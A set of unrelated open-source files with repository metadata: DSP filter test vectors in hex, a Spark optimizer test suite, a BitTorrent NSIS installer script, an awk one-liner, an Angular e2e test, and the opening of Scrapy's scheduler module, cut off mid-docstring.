0xacfe, 0x3c00, 0xbf72, 0x3c00, 0x3a82, 0xb1fa, 0x3c00, 0xbfdd, 0x3c00, 0x3aeb, 0xb200, 0x3c00, 0x3bc2, 0x3c00, 0xb788, 0xb380, 0x3c00, 0x3d87, 0x3c00, 0xb8e9, 0xb3dd, 0x3c00, 0xba05, 0x3c00, 0x347a, 0xb538, 0x3c00, 0xbe31, 0x3c00, 0x3b72, 0xb66c, 0x3c00, 0x3ec9, 0x3c00, 0xbcfe, 0xb73c, 0x251f, 0x28f0, 0x251f, 0xa163, 0x8249, 0x3c00, 0xb934, 0x3c00, 0x9825, 0x8d0d, 0x3c00, 0x3fad, 0x3c00, 0xab06, 0x9602, 0x3c00, 0xba25, 0x3c00, 0x2cb3, 0x96a5, 0x3c00, 0xb893, 0x3c00, 0x64d, 0x9ff3, 0x3c00, 0xbfb0, 0x3c00, 0x32b9, 0xa1a6, 0x3c00, 0x3c9f, 0x3c00, 0xb09d, 0xa5b7, 0x3c00, 0xba3a, 0x3c00, 0x3047, 0xa6b0, 0x3c00, 0x3d9d, 0x3c00, 0xb516, 0xa888, 0x3c00, 0xbf4c, 0x3c00, 0x344e, 0xa891, 0x3c00, 0xb0e9, 0x3c00, 0x8f9d, 0xa9ae, 0x3c00, 0x3aaf, 0x3c00, 0xb230, 0xab24, 0x3c00, 0xa295, 0x3c00, 0xacf4, 0xad23, 0x3c00, 0xbe80, 0x3c00, 0x371d, 0xb000, 0x3c00, 0xbe1b, 0x3c00, 0x3859, 0xb0c5, 0x3c00, 0xbfdc, 0x3c00, 0x3a6f, 0xb162, 0x3c00, 0x343a, 0x3c00, 0xb2e6, 0xb2bf, 0x3c00, 0x3594, 0x3c00, 0xb117, 0xb3f2, 0x3c00, 0x3fd9, 0x3c00, 0xbc02, 0xb406, 0x3c00, 0x3fff, 0x3c00, 0xbc2c, 0xb462, 0x3c00, 0xbbd6, 0x3c00, 0x3979, 0xb52e, 0x3c00, 0x3f4a, 0x3c00, 0xbc29, 0xb577, 0x3c00, 0x2ec0, 0x3c00, 0xabd0, 0xb6c2, 0x251f, 0xa8a9, 0x251f, 0xa157, 0x8e76, 0x3c00, 0xbf37, 0x3c00, 0xabf2, 0x945b, 0x3c00, 0xbfdb, 0x3c00, 0x3056, 0x9ce9, 0x3c00, 0x3d4c, 0x3c00, 0xb0b5, 0xa27e, 0x3c00, 0x3c7b, 0x3c00, 0x2a19, 0xa76d, 0x3c00, 0xbee3, 0x3c00, 0x340a, 0xa7f2, 0x3c00, 0x3e6f, 0x3c00, 0xb713, 0xac3c, 0x3c00, 0x3e2c, 0x3c00, 0xb6d4, 0xad58, 0x3c00, 0xbfa3, 0x3c00, 0x3871, 0xad77, 0x3c00, 0x3c76, 0x3c00, 0xb61d, 0xafa3, 0x3c00, 0x3acd, 0x3c00, 0xb437, 0xb010, 0x3c00, 0x3a5a, 0x3c00, 0xa0e2, 0xb15f, 0x3c00, 0x3ed1, 0x3c00, 0xbaf0, 0xb2a2, 0x3c00, 0x3ef1, 0x3c00, 0xbaea, 0xb3f6, 0x3c00, 0xbe27, 0x3c00, 0x3949, 0xb3f9, 0x3c00, 0x3f01, 0x3c00, 0xbc7b, 0xb504, 0x3c00, 0xbfdd, 0x3c00, 0x3c88, 0xb530, 0x3c00, 0x38b6, 0x3c00, 0x25c8, 0xb594, 0x3c00, 0x32a7, 0x3c00, 0xb339, 0xb59b, 0x3c00, 0x3f08, 0x3c00, 0xbcff, 0xb659, 0x3c00, 0x3db0, 0x3c00, 0xbbe0, 0xb785, 0x3c00, 0xbec3, 0x3c00, 0x3ca7, 0xb79c, 0x3c00, 0xba0f, 0x3c00, 0x3953, 0xb7b6, 0x251f, 0xa8dd, 0x251f, 0xaa4b, 0x919f, 0x3c00, 0x39a3, 0x3c00, 0xaa9f, 0xa275, 0x3c00, 0xbd4f, 0x3c00, 0x324f, 0xa537, 0x3c00, 0x3964, 0x3c00, 0x285f, 0xa58c, 0x3c00, 0x3a79, 0x3c00, 0xb524, 0xa81d, 0x3c00, 0xbac4, 0x3c00, 0x2898, 0xa825, 0x3c00, 0xbf83, 0x3c00, 0x37a3, 0xac1f, 0x3c00, 0x37bb, 0x3c00, 0xae2b, 0xaca7, 0x3c00, 0x3df6, 0x3c00, 0xb58d, 0xad5f, 0x3c00, 0xb893, 0x3c00, 0x3087, 0xaebf, 0x3c00, 0xae4b, 0x3c00, 0x2e99, 0xaf71, 0x3c00, 0xb63d, 0x3c00, 0x31b4, 0xb135, 0x3c00, 0x3f3a, 0x3c00, 0xba3a, 0xb1a7, 0x3c00, 0x3f84, 0x3c00, 0xbaee, 0xb247, 0x3c00, 0xc000, 0x3c00, 0x3c27, 0xb453, 0x3c00, 0xbf1f, 0x3c00, 0x3baa, 0xb49a, 0x3c00, 0xbf4d, 0x3c00, 0x3ca4, 0xb650, 0x3c00, 0xbfee, 0x3c00, 0x3d0e, 0xb673, 0x3c00, 0x3d5d, 0x3c00, 0xb9b0, 0xb686, 0x3c00, 0xbda3, 0x3c00, 0x3c2b, 0xb6c5, 0x3c00, 0xb919, 0x3c00, 0x3734, 0xb72a, 0x3c00, 0xbcc3, 0x3c00, 0x3ab6, 0xb771, 0x3c00, 0x3015, 0x3c00, 0xab9b, 0xb785 }; static const uint16_t in_rand_config[18] = { 0x0007, 0x0007, 0x0007, 0x0010, 0x0007, 0x0017, 0x0010, 0x0007, 0x0010, 0x0010, 0x0010, 0x0017, 0x0017, 0x0007, 0x0017, 0x0010, 0x0017, 0x0017 }; static const uint16_t in_rand_mono_val[138] = { 0x2dcf, 0x34c3, 0x35ec, 0xbaee, 0xb425, 0x3c00, 0xb285, 0x368f, 0x330d, 0x35a8, 0x2d54, 0x3350, 0xb59c, 0xbbc9, 0xb6ea, 0x3c00, 0x34f5, 0x34f7, 0xac89, 0xaa9c, 0xb378, 0xbb94, 0x39e2, 0x2911, 0x3998, 0x343f, 0x3720, 0xb84c, 0x3ae4, 0x3875, 0x339c, 0xb527, 0xb14c, 0xb44c, 0x9e5b, 0xbc00, 0xa30a, 0xba32, 0x3514, 0xb828, 0xae71, 0x3b84, 0xb58c, 0x361a, 0x329e, 0xb81c, 0x34a6, 0x1dff, 0xb794, 0xb997, 0x3c00, 0xb5ea, 0x2736, 0x35b9, 0xb544, 0xbc00, 0x2c50, 0x3228, 0x3532, 0xb69e, 0x36aa, 0x38ac, 0xa6b7, 0x2949, 0x3b16, 0x30b1, 0xb393, 0xb8d4, 0xb4d3, 0x2f09, 0x2002, 0x2879, 0x3ace, 0xba11, 0xb6fe, 0xb562, 0xb721, 0xb281, 0x3967, 0x2ecb, 0x2de4, 0x3bf5, 0xa9d4, 0xb5bc, 0xb231, 0xab9d, 0xb658, 0x388f, 0xbbfc, 0x3a36, 0x3241, 0xbc00, 0x3350, 0x2475, 0x3c00, 0x34c5, 0xb8d3, 0x3729, 0xb5a8, 0x3b90, 0xb58e, 0xb4c3, 0x1d69, 0xb571, 0x38e6, 0xb8c4, 0xafc5, 0xb17f, 0x2a61, 0xa7be, 0x369f, 0xbc00, 0x37ce, 0xb960, 0x3547, 0x3993, 0xae18, 0xb29a, 0xb110, 0x348f, 0xafbd, 0xb33f, 0xafd4, 0xbc00, 0xac94, 0xb547, 0xb3ce, 0xaceb, 0xb04c, 0x2e2a, 0x3986, 0xaef0, 0x2cc7, 0x3638, 0xb57c, 0x2654, 0x36ca, 0x337a }; static const uint16_t ref_rand_mono[138] = { 0x176f, 0x22b5, 0x2a76, 0x2f83, 0x32cf, 0x3517, 0x3640, 0x2033, 0x9697, 0x9a27, 0x99cf, 0xa22e, 0x9a8f, 0xa2c2, 0x23a0, 0x2a67, 0xc9b, 0xc96, 0xa76d, 0xabd2, 0x2612, 0xa44c, 0x2858, 0x127c, 0x22f0, 0x99cd, 0x9807, 0xa8e5, 0x28bd, 0x26be, 0x283a, 0xacb6, 0xa845, 0x27da, 0x2d9c, 0xa47e, 0xa9b4, 0xac28, 0x2df8, 0xa15b, 0x25f8, 0xabe8, 0x2708, 0x1c95, 0xa1c6, 0xa36d, 0x1df3, 0xa51b, 0x2021, 0x24b1, 0x2ad5, 0xb089, 0x2bda, 0x1f53, 0xa8aa, 0x2cb1, 0xacc4, 0x25ba, 0x2b24, 0xb0e2, 0x3456, 0xb5e0, 0x365d, 0xb5d7, 0x3484, 0xb0b3, 0xa1d6, 0x310f, 0xb4cf, 0x1881, 0x9b39, 0x1d3e, 0x2054, 0xa71b, 0x27c4, 0xaad0, 0x2f23, 0xb1e2, 0x341b, 0xb598, 0x379c, 0xb8df, 0x39e7, 0xbb2f, 0x3c33, 0xbc91, 0x3ce2, 0xbd2e, 0x3d23, 0xbcbf, 0x3c42, 0xbb52, 0x1cae, 0x904e, 0x276e, 0x2181, 0x2646, 0x2cee, 0xa8ef, 0x24d7, 0xa037, 0xaad9, 0xadbf, 0x31bf, 0x3433, 0x9e83, 0xbaa4, 0xb505, 0x3aa3, 0x3eb6, 0xb9c0, 0xc07b, 0xbd71, 0x41e8, 0x413f, 0x2323, 0xab2d, 0x3098, 0xb4bd, 0x3825, 0xba7e, 0x3ca8, 0xbe3b, 0x3fdd, 0xc0b7, 0x4163, 0xc1e0, 0x4229, 0xc242, 0x4238, 0xc219, 0x41e0, 0xc17f, 0x40de, 0xbfe5, 0x3d7e, 0xb94e, 0xae1c }; static const uint16_t in_rand_stereo_val[276] = { 0x2dcf, 0xb9ab, 0x34c3, 0xb470, 0x35ec, 0x3602, 0xbaee, 0xb8f5, 0xb425, 0xb5b1, 0x3c00, 0xb84e, 0xb285, 0xbc00, 0x368f, 0x3287, 0x330d, 0x3673, 0x35a8, 0xb2b4, 0x2d54, 0x3643, 0x3350, 0x2d95, 0xb59c, 0xa864, 0xbbc9, 0xb8e9, 0xb6ea, 0x3af8, 0x3c00, 0x39b7, 0x34f5, 0xb4f4, 0x34f7, 0xba75, 0xac89, 0xb81d, 0xaa9c, 0xb64f, 0xb378, 0x3c00, 0xbb94, 0xb39e, 0x39e2, 0xb47e, 0x2911, 0x35a9, 0x3998, 0x394f, 0x343f, 0xb313, 0x3720, 0x3a55, 0xb84c, 0x2d15, 0x3ae4, 0x34d0, 0x3875, 0xb8a9, 0x339c, 0xb7be, 0xb527, 0xbc00, 0xb14c, 0x3aa9, 0xb44c, 0xbbab, 0x9e5b, 0xb750, 0xbc00, 0x2c25, 0xa30a, 0xb66b, 0xba32, 0x3917, 0x3514, 0x3924, 0xb828, 0xb908, 0xae71, 0x36da, 0x3b84, 0xb659, 0xb58c, 0xb986, 0x361a, 0x24db, 0x329e, 0x3272, 0xb81c, 0x2a85, 0x34a6, 0x3778, 0x1dff, 0x3818, 0xb794, 0x2f1c, 0xb997, 0xbc00, 0x3c00, 0x34ff, 0xb5ea, 0x3962, 0x2736, 0xb49b, 0x35b9, 0xb637, 0xb544, 0xb78f, 0xbc00, 0x3449, 0x2c50, 0xb2b6, 0x3228, 0xb312, 0x3532, 0x36ca, 0xb69e, 0x38cc, 0x36aa, 0x344d, 0x38ac, 0xb551, 0xa6b7, 0xb824, 0x2949, 0x35c1, 0x3b16, 0xbc00, 0x30b1, 0xb8c0, 0xb393, 0xb97d, 0xb8d4, 0x35d8, 0xb4d3, 0x3401, 0x2f09, 0xb76b, 0x2002, 0xb8df, 0x2879, 0x36bb, 0x3ace, 0x30b8, 0xba11, 0xb8c6, 0xb6fe, 0xb5ec, 0xb562, 0x39dd, 0xb721, 0xb842, 0xb281, 0xb5f9, 0x3967, 0x364f, 0x2ecb, 0x3b69, 0x2de4, 0xb261, 0x3bf5, 0x3919, 0xa9d4, 0x38a6, 0xb5bc, 0x3c00, 0xb231, 0x2ceb, 0xab9d, 0x357d, 0xb658, 0x3496, 0x388f, 0x3717, 0xbbfc, 0xb8aa, 0x3a36, 0x3834, 0x3241, 0xb9c8, 0xbc00, 0xae78, 0x3350, 0x3c00, 0x2475, 0xac93, 0x3c00, 0x341e, 0x34c5, 0xb200, 0xb8d3, 0xb85f, 0x3729, 0xbacf, 0xb5a8, 0xb9f4, 0x3b90, 0xb4df, 0xb58e, 0x376c, 0xb4c3, 0xb875, 0x1d69, 0x327d, 0xb571, 0xb3b1, 0x38e6, 0xb5c6, 0xb8c4, 0xb84b, 0xafc5, 0x39a6, 0xb17f, 0x37f3, 0x2a61, 0x3b84, 0xa7be, 0xb296, 0x369f, 0x3bfc, 0xbc00, 0x3c00, 0x37ce, 0x28de, 0xb960, 0x33d4, 0x3547, 0xb75f, 0x3993, 0x3602, 0xae18, 0xae20, 0xb29a, 0x2f48, 0xb110, 0xa51c, 0x348f, 0xb1bb, 0xafbd, 0xac9b, 0xb33f, 0xb13e, 0xafd4, 0xb582, 0xbc00, 0xb4b6, 0xac94, 0x2b88, 0xb547, 0xb792, 0xb3ce, 0xb66f, 0xaceb, 0xb15d, 0xb04c, 0x310c, 0x2e2a, 0x3716, 0x3986, 0x3c00, 0xaef0, 0x2820, 0x2cc7, 0xafea, 0x3638, 0x3383, 0xb57c, 0x28a1, 0x2654, 0xb30b, 0x36ca, 0x2c9d, 0x337a, 0xb40c }; static const uint16_t ref_rand_stereo[276] = { 0x176f, 0xa342, 0x22b5, 0xabdb, 0x2a76, 0xb15c, 0x2f83, 0xb5d5, 0x32cf, 0xb93f, 0x3517, 0xbc24, 0x3640, 0xbdee, 0x2033, 0x1c2d, 0x9697, 0x1d31, 0x9a27, 0xa2ea, 0x99cf, 0x1e7e, 0xa22e, 0x9856, 0x9a8f, 0xa44f, 0xa2c2, 0x2231, 0x23a0, 0x2307, 0x2a67, 0x220b, 0xc9b, 0xa0cc, 0xc96, 0xa5e1, 0xa76d, 0xa5d6, 0xabd2, 0x1ef0, 0x2612, 0x2c43, 0xa44c, 0xa457, 0x2858, 0xa57b, 0x127c, 0x1f3e, 0x22f0, 0x20ca, 0x99cd, 0xa3c6, 0x9807, 0x1463, 0xa8e5, 0xa290, 0x28bd, 0x291a, 0x26be, 0xa61d, 0x283a, 0x1044, 0xacb6, 0xa6c8, 0xa845, 0x2c41, 0x27da, 0xa277, 0x2d9c, 0xa479, 0xa47e, 0xacc3, 0xa9b4, 0x2b15, 0xac28, 0x2b28, 0x2df8, 0x25fa, 0xa15b, 0xae0a, 0x25f8, 0xa763, 0xabe8, 0xef9, 0x2708, 0x2e9d, 0x1c95, 0xa899, 0xa1c6, 0x224c, 0xa36d, 0xac53, 0x1df3, 0x20c8, 0xa51b, 0xa5a2, 0x2021, 0x9c67, 0x24b1, 0x1988, 0x2ad5, 0x2ea7, 0xb089, 0xad4c, 0x2bda, 0xacb3, 0x1f53, 0x9ff4, 0xa8aa, 0x25e1, 0x2cb1, 0xa6d3, 0xacc4, 0x9e77, 0x25ba, 0x2c30, 0x2b24, 0xaf66, 0xb0e2, 0x306c, 0x3456, 0xb03a, 0xb5e0, 0x2deb, 0x365d, 0xa7b1, 0xb5d7, 0xa322, 0x3484, 0x1ba7, 0xb0b3, 0x295d, 0xa1d6, 0xaf16, 0x310f, 0x324e, 0xb4cf, 0xb483, 0x1881, 0xa0bf, 0x9b39, 0x1adf, 0x1d3e, 0x20a3, 0x2054, 0x9caa, 0xa71b, 0xa4f1, 0x27c4, 0x9c42, 0xaad0, 0x2a53, 0x2f23, 0xac74, 0xb1e2, 0x2b07, 0x341b, 0xaf20, 0xb598, 0x3352, 0x379c, 0xb4ec, 0xb8df, 0x35c4, 0x39e7, 0xb7ec, 0xbb2f, 0x3998, 0x3c33, 0xbad5, 0xbc91, 0x3c05, 0x3ce2, 0xbcdf, 0xbd2e, 0x3df7, 0x3d23, 0xbec5, 0xbcbf, 0x3f99, 0x3c42, 0xc04f, 0xbb52, 0x40d7, 0x1cae, 0x251f, 0x904e, 0x9d61, 0x276e, 0x29c8, 0x2181, 0x26ef, 0x2646, 0xa333, 0x2cee, 0x2ca6, 0xa8ef, 0xacd2, 0x24d7, 0x9e3c, 0xa037, 0x20f7, 0xaad9, 0x1b8f, 0xadbf, 0x2418, 0x31bf, 0xac9e, 0x3433, 0x26a0, 0x9e83, 0xa143, 0xbaa4, 0x3327, 0xb505, 0xb1b8, 0x3aa3, 0x27c5, 0x3eb6, 0xb85b, 0xb9c0, 0x383c, 0xc07b, 0xa811, 0xbd71, 0x3cdb, 0x41e8, 0xbdce, 0x413f, 0xb16e, 0x2323, 0x1fb1, 0xab2d, 0xa7f6, 0x3098, 0x2d75, 0xb4bd, 0xb1e9, 0x3825, 0x354d, 0xba7e, 0xb831, 0x3ca8, 0x39f4, 0xbe3b, 0xbbcf, 0x3fdd, 0x3cd3, 0xc0b7, 0xbdb0, 0x4163, 0x3e7a, 0xc1e0, 0xbf2a, 0x4229, 0x3fb6, 0xc242, 0xc00c, 0x4238, 0x4029, 0xc219, 0xc02e, 0x41e0, 0x4017, 0xc17f, 0xbfb9, 0x40de, 0x3ed8, 0xbfe5, 0xbd83, 0x3d7e, 0x3b76, 0xb94e, 0xb649, 0xae1c, 0xb251 };
Max
1
Trifunik/zephyr
tests/lib/cmsis_dsp/filtering/src/biquad_f16.pat
[ "Apache-2.0" ]
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.spark.sql.catalyst.optimizer import org.apache.spark.sql.catalyst.dsl.expressions._ import org.apache.spark.sql.catalyst.dsl.plans._ import org.apache.spark.sql.catalyst.plans.PlanTest import org.apache.spark.sql.catalyst.plans.logical.LocalRelation import org.apache.spark.sql.internal.SQLConf.OPTIMIZER_EXCLUDED_RULES class OptimizerRuleExclusionSuite extends PlanTest { val testRelation = LocalRelation('a.int, 'b.int, 'c.int) private def verifyExcludedRules(optimizer: Optimizer, rulesToExclude: Seq[String]): Unit = { val nonExcludableRules = optimizer.nonExcludableRules val excludedRuleNames = rulesToExclude.filter(!nonExcludableRules.contains(_)) // Batches whose rules are all to be excluded should be removed as a whole. val excludedBatchNames = optimizer.batches .filter(batch => batch.rules.forall(rule => excludedRuleNames.contains(rule.ruleName))) .map(_.name) withSQLConf( OPTIMIZER_EXCLUDED_RULES.key -> excludedRuleNames.foldLeft("")((l, r) => l + "," + r)) { val batches = optimizer.batches // Verify removed batches. assert(batches.forall(batch => !excludedBatchNames.contains(batch.name))) // Verify removed rules. assert( batches .forall(batch => batch.rules.forall(rule => !excludedRuleNames.contains(rule.ruleName)))) // Verify non-excludable rules retained. nonExcludableRules.foreach { nonExcludableRule => assert( optimizer.batches .exists(batch => batch.rules.exists(rule => rule.ruleName == nonExcludableRule))) } } } test("Exclude a single rule from multiple batches") { verifyExcludedRules( new SimpleTestOptimizer(), Seq( PushPredicateThroughJoin.ruleName)) } test("Exclude multiple rules from single or multiple batches") { verifyExcludedRules( new SimpleTestOptimizer(), Seq( CombineUnions.ruleName, RemoveLiteralFromGroupExpressions.ruleName, RemoveRepetitionFromGroupExpressions.ruleName)) } test("Exclude non-existent rule with other valid rules") { verifyExcludedRules( new SimpleTestOptimizer(), Seq( LimitPushDown.ruleName, InferFiltersFromConstraints.ruleName, "DummyRuleName")) } test("Try to exclude some non-excludable rules") { verifyExcludedRules( new SimpleTestOptimizer(), Seq( ReplaceIntersectWithSemiJoin.ruleName, PullupCorrelatedPredicates.ruleName, RewriteCorrelatedScalarSubquery.ruleName, RewritePredicateSubquery.ruleName, RewriteExceptAll.ruleName, RewriteIntersectAll.ruleName)) } test("Custom optimizer") { val optimizer = new SimpleTestOptimizer() { override def defaultBatches: Seq[Batch] = Batch("push", Once, PushPredicateThroughNonJoin, PushPredicateThroughJoin, PushProjectionThroughUnion) :: Batch("pull", Once, PullupCorrelatedPredicates) :: Nil override def nonExcludableRules: Seq[String] = PushPredicateThroughNonJoin.ruleName :: PullupCorrelatedPredicates.ruleName :: Nil } verifyExcludedRules( optimizer, Seq( PushPredicateThroughNonJoin.ruleName, PushProjectionThroughUnion.ruleName, PullupCorrelatedPredicates.ruleName)) } test("Verify optimized plan after excluding CombineUnions rule") { val excludedRules = Seq( ConvertToLocalRelation.ruleName, PropagateEmptyRelation.ruleName, CombineUnions.ruleName) val testRelation1 = LocalRelation('a.int, 'b.int, 'c.int) val testRelation2 = LocalRelation('a.int, 'b.int, 'c.int) val testRelation3 = LocalRelation('a.int, 'b.int, 'c.int) withSQLConf( OPTIMIZER_EXCLUDED_RULES.key -> excludedRules.foldLeft("")((l, r) => l + "," + r)) { val optimizer = new SimpleTestOptimizer() val originalQuery = testRelation1.union(testRelation2.union(testRelation3)).analyze val optimized = optimizer.execute(originalQuery) comparePlans(originalQuery, optimized) } } }
Scala
5
OlegPt/spark
sql/catalyst/src/test/scala/org/apache/spark/sql/catalyst/optimizer/OptimizerRuleExclusionSuite.scala
[ "Apache-2.0" ]
# The contents of this file are subject to the BitTorrent Open Source License # Version 1.0 (the License). You may not copy or use this file, in either # source code or executable form, except in compliance with the License. You # may obtain a copy of the License at http://www.bittorrent.com/license/. # # Software distributed under the License is distributed on an AS IS basis, # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License # for the specific language governing rights and limitations under the # License. # Written by Bram Cohen and Matt Chisholm !define VERSION "4.0.1" !define APPNAME "BitTorrent" Outfile ${APPNAME}-${VERSION}.exe Name "${APPNAME}" SilentInstall silent SetCompressor lzma InstallDir "$PROGRAMFILES\${APPNAME}\" ; This function ensures that you have administrator privileges ; it is copied from: ;http://nsis.sourceforge.net/archive/viewpage.php?pageid=275 Function IsUserAdmin Push $R0 Push $R1 Push $R2 ClearErrors UserInfo::GetName IfErrors Win9x Pop $R1 UserInfo::GetAccountType Pop $R2 StrCmp $R2 "Admin" 0 Continue StrCpy $R0 "true" Goto Done Continue: StrCmp $R2 "" Win9x StrCpy $R0 "false" Goto Done Win9x: StrCpy $R0 "true" Done: Pop $R2 Pop $R1 Exch $R0 FunctionEnd Function QuitIt checkforit: Processes::FindProcess "btdownloadgui.exe" StrCmp $R0 "1" foundit didntfindit waitforit: Sleep 2000 Goto checkforit foundit: MessageBox MB_OKCANCEL "You must quit ${APPNAME} before installing this \ version.$\r$\nPlease quit it and press OK to continue." IDOK waitforit Abort didntfindit: checkforit2: Processes::FindProcess "btmaketorrentgui.exe" StrCmp $R0 "1" foundit2 didntfindit2 waitforit2: Sleep 2000 Goto checkforit2 foundit2: MessageBox MB_OKCANCEL "You must quit ${APPNAME} metafile creator before \ installing this version.$\r$\nPlease quit it and press OK to continue." \ IDOK waitforit2 Abort didntfindit2: FunctionEnd ; This function is a copy of QuitIt because NSIS enforces weird namespace crap Function un.QuitIt checkforit: Processes::FindProcess "btdownloadgui.exe" StrCmp $R0 "1" foundit didntfindit waitforit: Sleep 2000 Goto checkforit foundit: MessageBox MB_OKCANCEL "You must quit ${APPNAME} before installing this \ version.$\r$\nPlease quit it and press OK to continue." IDOK waitforit Abort didntfindit: checkforit2: Processes::FindProcess "btmaketorrentgui.exe" StrCmp $R0 "1" foundit2 didntfindit2 waitforit2: Sleep 2000 Goto checkforit2 foundit2: MessageBox MB_OKCANCEL "You must quit ${APPNAME} metafile creator before \ installing this version.$\r$\nPlease quit it and press OK to continue." \ IDOK waitforit2 Abort didntfindit2: FunctionEnd ; This function automatically uninstalls older versions. ; It is partly copied from: ; http://nsis.sourceforge.net/archive/viewpage.php?pageid=326 Function .onInit Call QuitIt ClearErrors ReadRegStr $R0 HKLM \ "Software\Microsoft\Windows\CurrentVersion\Uninstall\${APPNAME}" \ "UninstallString" StrCmp $R0 "" done MessageBox MB_OKCANCEL|MB_ICONEXCLAMATION \ "Another version of ${APPNAME} is already installed. $\n$\nClick `OK` to \ remove the already installed version and continue installing this version. \ $\n$\nClick `Cancel` to cancel this installation." \ IDOK uninst Abort ;Run the uninstaller uninst: ExecWait '$R0 _?=$INSTDIR /S' ;Do not copy the uninstaller to a temp file IfErrors no_remove_uninstaller Goto endofuninst no_remove_uninstaller: MessageBox MB_OK "Uninstallation failed. Aborting." Abort endofuninst: done: FunctionEnd Section "Install" Call IsUserAdmin Pop $R0 StrCmp $R0 "false" abortinstall continueinstall abortinstall: MessageBox MB_OK "You must have Administrator privileges to install ${APPNAME}." Goto endofinstall continueinstall: SetOutPath $INSTDIR WriteUninstaller "$INSTDIR\uninstall.exe" File dist\*.exe File dist\*.pyd File dist\*.dll File dist\library.zip File /r dist\images File /r dist\lib File /r dist\etc File /r dist\share File redirdonate.html File credits.txt File LICENSE.txt File README.txt ; registry entries WriteRegStr HKCR .torrent "" bittorrent DeleteRegKey HKCR ".torrent\Content Type" WriteRegStr HKCR "MIME\Database\Content Type\application/x-bittorrent" Extension .torrent WriteRegStr HKCR bittorrent "" "TORRENT File" WriteRegBin HKCR bittorrent EditFlags 00000100 WriteRegStr HKCR "bittorrent\shell" "" open WriteRegStr HKCR "bittorrent\shell\open\command" "" `"$INSTDIR\btdownloadgui.exe" --responsefile "%1"` WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\${APPNAME}" "DisplayName" "${APPNAME} ${VERSION}" WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\${APPNAME}" "UninstallString" '"$INSTDIR\uninstall.exe"' ; Add items to start menu CreateDirectory "$SMPROGRAMS\${APPNAME}" CreateShortCut "$SMPROGRAMS\${APPNAME}\Downloader.lnk" "$INSTDIR\btdownloadgui.exe" CreateShortCut "$SMPROGRAMS\${APPNAME}\Make Torrent.lnk" "$INSTDIR\btmaketorrentgui.exe" CreateShortCut "$SMPROGRAMS\${APPNAME}\Donate.lnk" "$INSTDIR\redirdonate.html" ExecShell open "$INSTDIR\redirdonate.html" Sleep 2000 MessageBox MB_OK "${APPNAME} has been successfully installed!$\r$\n$\r$\nTo use ${APPNAME}, visit a web site which uses it and click on a link." BringToFront endofinstall: SectionEnd Section "Uninstall" Call un.QuitIt DeleteRegKey HKCR .torrent DeleteRegKey HKCR "MIME\Database\Content Type\application/x-bittorrent" DeleteRegKey HKCR bittorrent DeleteRegKey HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\${APPNAME}" RMDir /r "$INSTDIR" RMDir /r "$SMPROGRAMS\${APPNAME}" SectionEnd
NSIS
4
s4-2/scancode-toolkit
tests/licensedcode/data/datadriven/external/atarashi/BitTorrent-1.0.nsi
[ "Apache-2.0", "CC-BY-4.0" ]
{i=$(1); print i}
Logos
2
Crestwave/goawk
testdata/t.4.x
[ "MIT" ]
import { browser, element, by } from 'protractor'; describe('Tour of Heroes', () => { beforeEach(() => browser.get('/')); it('should display "Tour of Heroes"', async () => { const title = await element(by.css('app-root h1')).getText(); expect(title).toEqual('Tour of Heroes'); }); });
TypeScript
4
John-Cassidy/angular
aio/content/examples/toh-pt0/e2e/src/app.e2e-spec.ts
[ "MIT" ]
import json import logging import os from abc import abstractmethod from os.path import exists, join from typing import Optional, Type, TypeVar from twisted.internet.defer import Deferred from scrapy.crawler import Crawler from scrapy.http.request import Request from scrapy.spiders import Spider from scrapy.utils.job import job_dir from scrapy.utils.misc import create_instance, load_object logger = logging.getLogger(__name__) class BaseSchedulerMeta(type): """ Metaclass to check scheduler classes against the necessary interface """ def __instancecheck__(cls, instance): return cls.__subclasscheck__(type(instance)) def __subclasscheck__(cls, subclass): return ( hasattr(subclass, "has_pending_requests") and callable(subclass.has_pending_requests) and hasattr(subclass, "enqueue_request") and callable(subclass.enqueue_request) and hasattr(subclass, "next_request") and callable(subclass.next_request) ) class BaseScheduler(metaclass=BaseSchedulerMeta): """ The scheduler component is responsible for storing requests received from the engine, and feeding them back upon request (also to the engine). The original sources of said requests are: * Spider: ``start_requests`` method, requests created for URLs in the ``start_urls`` attribute, request callbacks * Spider middleware: ``process_spider_output`` and ``process_spider_exception`` methods * Downloader middleware: ``process_request``, ``process_response`` and ``process_exception`` methods The order in which the scheduler returns its stored requests (via the ``next_request`` method) plays a great part in determining the order in which those requests are downloaded. The methods defined in this class constitute the minimal interface that the Scrapy engine will interact with. """ @classmethod def from_crawler(cls, crawler: Crawler): """ Factory method which receives the current :class:`~scrapy.crawler.Crawler` object as argument. """ return cls() def open(self, spider: Spider) -> Optional[Deferred]: """ Called when the spider is opened by the engine. It receives the spider instance as argument and it's useful to execute initialization code. :param spider: the spider object for the current crawl :type spider: :class:`~scrapy.spiders.Spider` """ pass def close(self, reason: str) -> Optional[Deferred]: """ Called when the spider is closed by the engine. It receives the reason why the crawl finished as argument and it's useful to execute cleaning code. :param reason: a string which describes the reason why the spider was closed :type reason: :class:`str` """ pass @abstractmethod def has_pending_requests(self) -> bool: """ ``True`` if the scheduler has enqueued requests, ``False`` otherwise """ raise NotImplementedError() @abstractmethod def enqueue_request(self, request: Request) -> bool: """ Process a request received by the engine. Return ``True`` if the request is stored correctly, ``False`` otherwise. If ``False``, the engine will fire a ``request_dropped`` signal, and will not make further attempts to schedule the request at a later time. For reference, the default Scrapy scheduler returns ``False`` when the request is rejected by the dupefilter. """ raise NotImplementedError() @abstractmethod def next_request(self) -> Optional[Request]: """ Return the next :class:`~scrapy.http.Request` to be processed, or ``None`` to indicate that there are no requests to be considered ready at the moment. Returning ``None`` implies that no request from the scheduler will be sent to the downloader in the current reactor cycle. The engine will continue calling ``next_request`` until ``has_pending_requests`` is ``False``. """ raise NotImplementedError() SchedulerTV = TypeVar("SchedulerTV", bound="Scheduler") class Scheduler(BaseScheduler): """ Default Scrapy scheduler. This implementation also handles duplication filtering via the 